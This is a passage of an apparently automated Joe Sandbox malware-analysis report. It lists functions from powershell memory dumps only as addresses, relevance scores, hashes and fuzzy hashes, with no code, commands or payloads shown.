                            • Instruction ID: 1765c3e5e30e612c729f1aabcbd9fc6bc4a68a56511c76d56e29a3d3d26e8048
                            • Opcode Fuzzy Hash: c80dd0282c1aef2945e200ad37cf9b9aea55c6f31acba2b6357cac0208560c3c
                            • Instruction Fuzzy Hash: C7516B75A00208DFCB14DFA8C884AADBBF2FF88354F158469D4169B765EB35AC46CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474B2FC Relevance: .1, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bdb0f6400811a1399059f7fdd8b2220edfb114549dd9c44eae48ecda0278c19
                            • Instruction ID: de6e4b7bf5270074b8900eed78fa5e4207e70512a28b69d19063fa21d93e5318
                            • Opcode Fuzzy Hash: 6bdb0f6400811a1399059f7fdd8b2220edfb114549dd9c44eae48ecda0278c19
                            • Instruction Fuzzy Hash: 0A414A35B00200DFDB14DB75C998AB9BBB6EF89355F149468E406EB3A0EB35EC41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04742C58 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a271b3edb2fcc70f74a8f4ca917e87bece6e0e1eccce4760f2f973d145b352c8
                            • Instruction ID: 09dd9f1d8bb1f5f269f41f858c4e78068bdb6a85703f5ce06b1227c83f7ba532
                            • Opcode Fuzzy Hash: a271b3edb2fcc70f74a8f4ca917e87bece6e0e1eccce4760f2f973d145b352c8
                            • Instruction Fuzzy Hash: 96414AB4A001059FCB05CF99C1949BAFBB1FF88350B158599E4119B366C735FC50CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748478 Relevance: .1, Instructions: 102COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 41a5efbbf6fbb554981a1e596cf11bab575755a454adc9efc230f40b16a7f41a
                            • Instruction ID: 41a102853f3f03479d9cbb2a8566b32825f93d9d7b324ffbf4b0216f77d0ba8c
                            • Opcode Fuzzy Hash: 41a5efbbf6fbb554981a1e596cf11bab575755a454adc9efc230f40b16a7f41a
                            • Instruction Fuzzy Hash: 61312235A042488FC701EF69E4809AEBFF2EF89350B4141A9D4059F326DB30E98587E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07652CD4 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54dfd736727d7fd712da12379717a03b0b0f1ff04ee54b3d51b92fd015e4ac4d
                            • Instruction ID: 03d50ec7b2ca6d06e79acbd76f912b37ccdbc772bf325fe2c21cfb1e701d3dbb
                            • Opcode Fuzzy Hash: 54dfd736727d7fd712da12379717a03b0b0f1ff04ee54b3d51b92fd015e4ac4d
                            • Instruction Fuzzy Hash: CC313AF37001248FD710677C89216AEBB92BFD5319F1485AAD9029F366CE329D42D7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748DFF Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed9cd400dc55d04b708867decf811b365ceaa0d481d2d44862fd8ff4fd3154c9
                            • Instruction ID: 9361a01cf9f3caf851644f0adde0847d53088b949eb64b5a6ece10e821c5d714
                            • Opcode Fuzzy Hash: ed9cd400dc55d04b708867decf811b365ceaa0d481d2d44862fd8ff4fd3154c9
                            • Instruction Fuzzy Hash: CE317A34E001589FCB14EFA4D580BADB7F6AF89304F158069E412AB760DB30BD4ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474C038 Relevance: .1, Instructions: 85COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c7a88a56af9b575f613dfebe923c3e3e1fda08259cf731bf63d37049f07ef65a
                            • Instruction ID: 0b470cdc6d96c717f009425680940c7bd83dbf3a9f489ca8a0cb1c39ba047c47
                            • Opcode Fuzzy Hash: c7a88a56af9b575f613dfebe923c3e3e1fda08259cf731bf63d37049f07ef65a
                            • Instruction Fuzzy Hash: 15311875A005099FCB15CF5CC9849AAFBF1FF89310B258A99E519EB751C732EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748B1A Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be00f414e033d7083db3145e2a8ef8378ce8287f5da6520f8caf3f5d9719fd13
                            • Instruction ID: 636d7a4885c7f657d6ee012dda6c167a28a28b027e1a7e1723c2c8f241358f49
                            • Opcode Fuzzy Hash: be00f414e033d7083db3145e2a8ef8378ce8287f5da6520f8caf3f5d9719fd13
                            • Instruction Fuzzy Hash: F23159357001089FCB14DF29D958AAE7BF2EF89761F150068E506EB3A1DB71AC45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 047431C8 Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b5f1861ffcee8deb1bc9a626275df5eee0a41b9cefce8e6dd835a93aabe1918
                            • Instruction ID: a613d7e57c4bdab252dbe60f69e5191fb18bd9bced47ef252b56f1dbd64160d0
                            • Opcode Fuzzy Hash: 7b5f1861ffcee8deb1bc9a626275df5eee0a41b9cefce8e6dd835a93aabe1918
                            • Instruction Fuzzy Hash: 8E215EB4A042199FCB00CF98C9809AEBBB1FF89310B158596E819EB352C731FD41CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748720 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01173dbe9d11c459411a32bd8335117f9737638daa5e5a89bbe50c92b0108140
                            • Instruction ID: 491ab04386704a69662871d9bed8a081a937c6000866b698eee461698994827b
                            • Opcode Fuzzy Hash: 01173dbe9d11c459411a32bd8335117f9737638daa5e5a89bbe50c92b0108140
                            • Instruction Fuzzy Hash: 3711B6352053448FC7169769D414BA5BFE9AFC6214F1A44DAE00CCF6A3C776E846C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474AAD2 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8ec3553a63793f35f0eed15787fc140ef1217396922c91e544656e40d408b8ca
                            • Instruction ID: 13785318157327fde5dd56f8561f1eae73725862ab9fb14af7f3f9282f2ea268
                            • Opcode Fuzzy Hash: 8ec3553a63793f35f0eed15787fc140ef1217396922c91e544656e40d408b8ca
                            • Instruction Fuzzy Hash: FE01FC357043808FC725CB66D814BB6BBE6DBC2259F0984AED4598BB51C739EC85C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 047486B0 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38b33935d78519202cae7a2da295620b603f032ccdfd18e7bd494452f2ae7d1f
                            • Instruction ID: b65439004356a6bbe3be588228047fbf630f10e14bdd07517efa4215713e63d7
                            • Opcode Fuzzy Hash: 38b33935d78519202cae7a2da295620b603f032ccdfd18e7bd494452f2ae7d1f
                            • Instruction Fuzzy Hash: 360192392093808FCB1397258864661BFB45FC724571B44DBD088CF2A3C72ADC46C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0463D01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b77cd19decf770533ffcac654c02c7b7911e8eca8799b7e015fd1eb1b8fdaee1
                            • Instruction ID: 3415c4adb5f1f0cc709c29d555de3f0239794ea15e8aae13a843f11244c5c5e0
                            • Opcode Fuzzy Hash: b77cd19decf770533ffcac654c02c7b7911e8eca8799b7e015fd1eb1b8fdaee1
                            • Instruction Fuzzy Hash: F1012B315083809AE7104F25DD84B67BFD8DF55725F08C42AED080F246E379E882C6B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748710 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d24f7baa79b6823a5d87e0fcd0a4dac20ee6872630edd0de3a1a5404692d0a85
                            • Instruction ID: 55d101f2260b355f45b09fcea640061f650d681d47af55385006d81019076ece
                            • Opcode Fuzzy Hash: d24f7baa79b6823a5d87e0fcd0a4dac20ee6872630edd0de3a1a5404692d0a85
                            • Instruction Fuzzy Hash: ACF02839300304DFCB12AB65D554AA6BBF4EBCA365B0640AFD448CB712C776D846C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 047486D0 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66440c18b917e2dd5593c287b11073015a0100675ddb14dc432e1cc5fccd9a52
                            • Instruction ID: 08928f5a30f4424c5d3d366b03532b663c1b63f60e716414d8bb5d67ed2a55a1
                            • Opcode Fuzzy Hash: 66440c18b917e2dd5593c287b11073015a0100675ddb14dc432e1cc5fccd9a52
                            • Instruction Fuzzy Hash: 66F0F6392043048FC7269B56D454AA2BFE8EFC6355B0A409AE1088F752C732F885C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748692 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64c6041afd958138ea9eb9df910e0e4d6212003405dc54d1830b16b5bb07c1f3
                            • Instruction ID: e4664c42906730c87525eea0b0321c23606b4e0bd324d8653d87f597aac8df8f
                            • Opcode Fuzzy Hash: 64c6041afd958138ea9eb9df910e0e4d6212003405dc54d1830b16b5bb07c1f3
                            • Instruction Fuzzy Hash: DBF0AF392047448FCB16EB55D554AA1BBE4EBC63A6B1A44DAD0088F253D732E846CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0463D01C Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b96011a1407e7898f3912ed556e432ca39799eecec1a4b65142738c31076525
                            • Instruction ID: f83123b82890157665dec1b89fcc3dc0fca6205b2f9fc6a8ff7571edfe2bbe02
                            • Opcode Fuzzy Hash: 8b96011a1407e7898f3912ed556e432ca39799eecec1a4b65142738c31076525
                            • Instruction Fuzzy Hash: FDF0C272004380AEE7108F16D884B62FFA8EB55735F18C45AED480E286D379A841CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748518 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de37187e887ed087ed81a0c9c38d449d58cf2c1ea8fbf94cdc8b26abad5028eb
                            • Instruction ID: 366e3c60f8b017011812338645b2aeff8148d11732d20846c803e10881613a97
                            • Opcode Fuzzy Hash: de37187e887ed087ed81a0c9c38d449d58cf2c1ea8fbf94cdc8b26abad5028eb
                            • Instruction Fuzzy Hash: 3BF09774E0020A8FC780DF68D485AAEBBF0BF49214F5041A9D509EB321E730A955CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474A758 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bbe8b9fa7da0c03fa5f608cf26de34d25240263c31d96d56b1be69841aefd91
                            • Instruction ID: bd1341cc4cea09a8194fcf4d818fa6b30bdf7775b162b8f135c835a2672627e2
                            • Opcode Fuzzy Hash: 2bbe8b9fa7da0c03fa5f608cf26de34d25240263c31d96d56b1be69841aefd91
                            • Instruction Fuzzy Hash: 99E022313443001FD300E728E680AEABBA2DBC5300B004169E101CB758CF75FC828BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0463D244 Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57b5997370da5f4ae1886100c5c6a43050091157843533859e8d18833a1f625f
                            • Instruction ID: 49693373d3619e1f5a2afd74a06d5a1832bc58ddfc056769228fdaf005d7837c
                            • Opcode Fuzzy Hash: 57b5997370da5f4ae1886100c5c6a43050091157843533859e8d18833a1f625f
                            • Instruction Fuzzy Hash: B4210872500280DFDF05DF14D9C4B2ABFA5FB88315F24C569EA090B315D33AE456DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765B4A8 Relevance: 21.7, Strings: 17, Instructions: 494COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84|l$84|l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-2050030284
                            • Opcode ID: ce3bfcd432dc54157a540958c3db4e033ca177ec7d636025674aac4ef6d68285
                            • Instruction ID: 9fdbc0340977d7848b5851a3ba1ff262818ae13d982e217805d33c7ae9d3eb9f
                            • Opcode Fuzzy Hash: ce3bfcd432dc54157a540958c3db4e033ca177ec7d636025674aac4ef6d68285
                            • Instruction Fuzzy Hash: 2B0206F1B0020ADFCB298E39D4446AABBA2EF86311F14C46ADC5A8F355DB31CD85D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765C9E5 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$84|l$84|l$84|l$84|l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                            • API String ID: 0-3507498318
                            • Opcode ID: 31b6f468a4937687843a7e42bebe52d1f5b02c2d81d5ca5615d09a59d1b97ef5
                            • Instruction ID: 820b1af3c11710d8303b2023f53f687f00d9521a883f7c9b3abc30f55b4319f6
                            • Opcode Fuzzy Hash: 31b6f468a4937687843a7e42bebe52d1f5b02c2d81d5ca5615d09a59d1b97ef5
                            • Instruction Fuzzy Hash: 7FA1D3B1B4030B9FCB24DF78D94466ABBE2EB89310F148459EC029B395DA31DD45EBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07655300 Relevance: 12.9, Strings: 10, Instructions: 396COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-3512890053
                            • Opcode ID: 29d8a4a82089a8bf5bf529ad7ca1a8a1faace9aaedb106e221197c13e01e40d4
                            • Instruction ID: e1914b998bd331eb9eaed0fb7e2c647e489b9649c960aed7f24d4a22441cf77c
                            • Opcode Fuzzy Hash: 29d8a4a82089a8bf5bf529ad7ca1a8a1faace9aaedb106e221197c13e01e40d4
                            • Instruction Fuzzy Hash: 26C138B1B002068FCB245A79D84867ABBE7AFC5310F24847AE807CB356EF31D956D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765DBC0 Relevance: 12.9, Strings: 10, Instructions: 374COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l$4'^q$4'^q$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-3201190886
                            • Opcode ID: 53d251b319f95385ce0517c96540f9a6a755c25aa1a5e9ca14d37b81cc120814
                            • Instruction ID: 3a362ce3856b4797528ed1486bf31b2cc6dd871bf29d7e5eb503a4787e681454
                            • Opcode Fuzzy Hash: 53d251b319f95385ce0517c96540f9a6a755c25aa1a5e9ca14d37b81cc120814
                            • Instruction Fuzzy Hash: 40E194B0B402099FDB14DF68C951B5EBBF3AF88700F148429D9026F795CB32ED869B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07654D30 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-788909730
                            • Opcode ID: 2d309b6132612a8f3446112c607876c4b867e3e8bad314d0cdc8352bb19895e5
                            • Instruction ID: 97e656a0763f96ebce161a11234d1af6bbf613d93bf1414cbccbdc25a7c162b1
                            • Opcode Fuzzy Hash: 2d309b6132612a8f3446112c607876c4b867e3e8bad314d0cdc8352bb19895e5
                            • Instruction Fuzzy Hash: A8A168B1B002459FDB289A79C8446AABFE2ABC5310F14C5AAD8078F345DF32DD82D7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765DBA0 Relevance: 7.8, Strings: 6, Instructions: 317COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-3244723969
                            • Opcode ID: c38f99f71eb53811ef67e60724e48acc4593fdf5ee70044dc46d498f7301fd7d
                            • Instruction ID: 2d0a873cfd65d3d60553ffc498a58a70ea6edfea9e758ce57753f3ba28dc973d
                            • Opcode Fuzzy Hash: c38f99f71eb53811ef67e60724e48acc4593fdf5ee70044dc46d498f7301fd7d
                            • Instruction Fuzzy Hash: DFC194B0B40205DFDB24DF64C981B9EBBB2BF88704F148519D8066F795CB32AD86DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765C4B4 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            • Opcode ID: dde1ef97c42efb8ed97981cb03e0548985e7d5c60b9af35aa1f3d0572f620d2c
                            • Instruction ID: 0ae651f353c441eff9503159a322e76d5f96b7ef3d1eeca830a8640b3a343864
                            • Opcode Fuzzy Hash: dde1ef97c42efb8ed97981cb03e0548985e7d5c60b9af35aa1f3d0572f620d2c
                            • Instruction Fuzzy Hash: 5A3165F6B043078FCB284EB9885067AB7E6AB85610F24456ADC438B345CE36C466E771
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07654D15 Relevance: 6.4, Strings: 5, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                            • API String ID: 0-3997570045
                            • Opcode ID: 02c6f857e4297bc634cd5990df14fd0eeb8aaf799314a16da8e94493fb7b6fd8
                            • Instruction ID: 90d38e63ed8fd4cde785a8bd18675af7be4fb11802c24c78a0a78fdc020d6404
                            • Opcode Fuzzy Hash: 02c6f857e4297bc634cd5990df14fd0eeb8aaf799314a16da8e94493fb7b6fd8
                            • Instruction Fuzzy Hash: 6C41F5B1A04286EFDB248F24C584BA5BFE1AB85710F1881E6DC168F395CF32D9C1DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076500F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$tl$tl
                            • API String ID: 0-223199581
                            • Opcode ID: 5018573bf671bed1513234f07bdd1e0d42ba8e8cba9ff86ab540dfad0f5ef50b
                            • Instruction ID: a22f80a925c9a7a2412efc001a45026512ef5472776469f0099676c4cc8e5cda
                            • Opcode Fuzzy Hash: 5018573bf671bed1513234f07bdd1e0d42ba8e8cba9ff86ab540dfad0f5ef50b
                            • Instruction Fuzzy Hash: 5D11297530430A9BEB3549BA9804B67B796ABC1760F24C42AEC4A8A350ED31C485D752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765BAF8 Relevance: 5.5, Strings: 4, Instructions: 479COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (o^q$(o^q$(o^q$(o^q
                            • API String ID: 0-1978863864
                            • Opcode ID: 9503ece461220fb3748e37523275f5a77220f0b5a2164ea78e1afb599054d2b0
                            • Instruction ID: 608499b9497293e6de249119fccaff127b9058042e4e3fa0c458ed323fdab310
                            • Opcode Fuzzy Hash: 9503ece461220fb3748e37523275f5a77220f0b5a2164ea78e1afb599054d2b0
                            • Instruction Fuzzy Hash: C3F139F1704346DFCB158F78C844BAA7BA1EF85310F18846AE90A8F391DB36D845DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07659BF8 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l
                            • API String ID: 0-538009330
                            • Opcode ID: 9a9a0ff487c47c314c71a25172cefe02431503acbbef7720cd28f6f9d6a7e9ae
                            • Instruction ID: 03e6765cd9a9af572c2a4be2b1e01e9b710d5d9f4212c89045828479c07890c6
                            • Opcode Fuzzy Hash: 9a9a0ff487c47c314c71a25172cefe02431503acbbef7720cd28f6f9d6a7e9ae
                            • Instruction Fuzzy Hash: AFA18DB0A00705DBDB24CF64C940AAAFBB2BF89714F18C52ADD076B745D732B842DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076523C8 Relevance: 5.2, Strings: 4, Instructions: 202COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,S~l$,S~l$p5nk$xS~l
                            • API String ID: 0-3704198172
                            • Opcode ID: 2b86f0f1a58753641b5569f61383306045309f38b4bca3f1471529c2fa97f335
                            • Instruction ID: 6d3ad97059996aea9c8b2c432160773712de419791c5d78e9e0dee9e6310f8b7
